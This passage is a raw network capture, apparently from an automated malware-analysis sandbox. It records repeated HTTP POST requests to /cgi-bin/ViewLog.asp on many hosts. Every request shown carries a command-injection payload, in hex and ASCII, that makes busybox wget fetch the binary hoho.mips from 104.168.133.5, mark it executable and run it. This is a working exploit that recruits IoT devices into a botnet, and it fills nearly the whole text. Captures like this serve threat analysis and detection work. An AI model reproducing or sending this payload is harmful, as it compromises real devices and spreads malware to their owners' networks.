                                              Nov 23, 2023 05:17:53.702227116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              412192.168.2.133920431.136.170.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:17.958403111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:18.534348965 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:19.654442072 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:21.958529949 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:26.566314936 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.526323080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.702229023 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              413192.168.2.133649894.122.21.788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:17.963757992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              414192.168.2.135964862.29.29.1678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:17.994545937 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              415192.168.2.135132062.82.153.158080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:18.726110935 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:19.750505924 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              416192.168.2.134398694.123.181.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:18.761110067 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              417192.168.2.135508631.136.172.288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.167716980 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:19.750488043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.870345116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:23.238326073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:27.846366882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:36.806299925 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.750221968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              418192.168.2.134167294.121.122.2538080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.207834005 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              419192.168.2.134487094.120.42.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:19.213568926 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              420192.168.2.135182831.136.221.1488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:20.129679918 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:20.710323095 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:21.862348080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:24.262301922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:28.870320082 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
